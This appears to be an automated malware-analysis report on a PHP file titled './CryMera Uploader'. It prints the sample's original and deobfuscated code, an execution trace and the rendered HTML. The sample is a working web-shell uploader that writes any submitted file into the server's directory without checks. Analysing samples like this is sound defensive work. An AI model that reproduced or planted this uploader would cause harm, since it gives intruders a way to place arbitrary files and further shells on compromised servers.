PHP Malware Analysis
bypltd.php
md5: 2f6503a9ebbe4f6cb2115432dd3f5528
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- getcwd (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- ./CryMera Uploader (Deobfuscated, HTML, Original)
URLs
- http://anicrack-indo.netii.net/error.css (Deobfuscated, HTML, Original)
- http://fonts.googleapis.com/css?family=Iceland (Deobfuscated, HTML, Original)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css (Deobfuscated, HTML, Original)
- https://g.top4top.io/p_1771gvucn0.png (Deobfuscated, HTML, Original)
- https://use.fontawesome.com/releases/v5.3.1/css/all.css (Deobfuscated, HTML, Original)
- https://www.itsteamsec.my.id (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
echo "<link rel=\"shortcut icon\" href=\"https://g.top4top.io/p_1771gvucn0.png\">";
echo "<center>";
echo "<br><br><br><img height=\"200\" src=\"https://g.top4top.io/p_1771gvucn0.png\"></a>\n";
echo "<title>./CryMera Uploader</title>";
echo "<body style=\"background-color: #272B2E; color: white;\"\nalink=\"#ee0000\" link=\"#0000ee\" vlink=\"#551a8b\">";
echo "<center>";
echo "<br><br>";
echo '<big><span style="color: white;">' . getcwd() . '</span></big><br><br>';
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"> \n<input type=\"file\" name=\"mlf\"/>\n<input name=\"upl\" id=\"upl\" type=\"submit\" value=\"upload\" />\n</form>";
if ($_POST['upl'] == "upload") {
if (@copy($_FILES['mlf']['tmp_name'], $_FILES['mlf']['name'])) {
echo "<font size=\"2\" color=\"white\">Succes</font>";
} else {
echo "<font size=\"2\" color=\"white\">Failed</font>";
}
}
echo "</body></div><br><br><link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.3.1/css/all.css\"><center>\n<i class=\"fa fa-envelope\"></i>\n<i class=\"fa fa-instagram\"></i>\n<i class=\"fa fa-facebook\"></i>\n<i class=\"fa fa-blog\"></i><br> <br><a href=\"https://www.itsteamsec.my.id\"><font color=\"red\">\n exit<font color=\"white\"> ()<font color=\"white\">;\n";
?>
<!DOCTYPE html>
<head>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'/>
<link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</head>
<html>
</body>
</html>Execution traces
data/traces/2f6503a9ebbe4f6cb2115432dd3f5528_trace-1676245732.3963.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:49:18.294093]
1 0 1 0.000153 393528
1 3 0 0.000218 397848 {main} 1 /var/www/html/uploads/bypltd.php 0 0
2 4 0 0.000235 397848 getcwd 0 /var/www/html/uploads/bypltd.php 15 0
2 4 1 0.000250 397896
2 4 R '/var/www/html/uploads'
1 3 1 0.000285 397848
0.000310 314240
TRACE END [2023-02-12 21:49:18.294280]
Generated HTML code
<html><head><link rel="shortcut icon" href="https://g.top4top.io/p_1771gvucn0.png"></head><body style="background-color: #272B2E; color: white;" alink="#ee0000" link="#0000ee" vlink="#551a8b"><center><br><br><br><img height="200" src="https://g.top4top.io/p_1771gvucn0.png">
<title>./CryMera Uploader</title><center><br><br><big><span style="color: white;">/var/www/html</span></big><br><br><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<input type="file" name="mlf">
<input name="upl" id="upl" type="submit" value="upload">
</form><br><br><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><center>
<i class="fa fa-envelope"></i>
<i class="fa fa-instagram"></i>
<i class="fa fa-facebook"></i>
<i class="fa fa-blog"></i><br> <br><a href="https://www.itsteamsec.my.id"><font color="red">
exit<font color="white"> ()<font color="white">;
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</font></font></font></a></center></center></center></body></html>Original PHP code
<?php
{
echo '<link rel="shortcut icon" href="https://g.top4top.io/p_1771gvucn0.png">';
echo '<center>';
echo '<br><br><br><img height="200" src="https://g.top4top.io/p_1771gvucn0.png"></a>
';
echo '<title>./CryMera Uploader</title>';
echo'<body style="background-color: #272B2E; color: white;"
alink="#ee0000" link="#0000ee" vlink="#551a8b">';
echo '<center>';
echo '<br><br>';
echo '<big><span style="color: white;">'.getcwd().'</span></big><br><br>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<input type="file" name="mlf"/>
<input name="upl" id="upl" type="submit" value="upload" />
</form>';
if($_POST['upl'] == "upload")
if(@copy($_FILES['mlf']['tmp_name'], $_FILES['mlf']['name']))
{echo '<font size="2" color="white">Succes</font>';}
else
{echo '<font size="2" color="white">Failed</font>';}
echo '</body></div><br><br><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><center>
<i class="fa fa-envelope"></i>
<i class="fa fa-instagram"></i>
<i class="fa fa-facebook"></i>
<i class="fa fa-blog"></i><br> <br><a href="https://www.itsteamsec.my.id"><font color="red">
exit<font color="white"> ()<font color="white">;
';
}
?>
<!DOCTYPE html>
<head>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'/>
<link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</head>
<html>
</body>
</html>